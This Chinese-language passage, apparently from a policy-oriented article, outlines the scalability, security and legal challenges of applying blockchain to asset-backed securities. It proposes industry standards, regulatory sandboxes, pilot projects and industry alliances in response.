一是区块链技术规模化难以实现。中国人民银行曾表示区块链技术虽鼓励探索,但就目前设施水平来说,账本中不断增添的数据可能占用过多计算与储存资源,无法完全应对现存交易规模。在未来还面临将多个区块链方案与不同特定技术并存的现象,业务拓展的跨链需求要有足够的通用标准来满足,这给信息互通和场景适应化带来更高挑战。二是区块链系统存在安全隐患。区块链的分布式节点结构更易受到攻击,单个节点拥有的系统总账本也随之暴露出来,风险难以控制。三是区块链相关法律制度亟待完善。区块链技术的基本构成要素存在法律认定空白,如账本中的共识信息是否认定为参与方需履行义务、数字资产的权利义务关系、智能合约与现存合同法的内容形式冲突问题等。

面临新兴技术引入的诸多挑战,谨慎之余也应充满信心、积极应对,本文尝试提出以下建议。首先,制定区块链行业标准和监管机制。行业标准包括技术标准、应用标准、产业合作标准等,对实用性较强、可行性较高领域的改革给予优先度。在《2016年中国区块链技术和应用发展白皮书》中,工信部做出了先行表率,提出区块链标准化路线。除了重视区块链技术对现有法律法规与管理框架冲击的补充外,还应尝试升级监管手段,关注国内外监管科技的发展,如英国FCA沙盒监管制度等,利用新兴科技提高监管效率。其次,加强区块链ABS项目示范工作。推动相对成熟的区块链ABS平台或项目落地,或组织研究现存的“区块链+ABS”平台或项目,形成市场示范效应,鼓励大企业牵头,产学研用联合,营造推广应用环境。最后,探寻产业主体合作有效机制。由于区块链产业链中各种类型主体参与是必不可少的,金融参与方、技术方和监管方的合作难协调性与高复杂性可见一斑。参考国际经验如R3区块链联盟等,借助行业联盟、行业协会等平台促进各主体之间的联动与合作,助力区块链技术应用软着陆。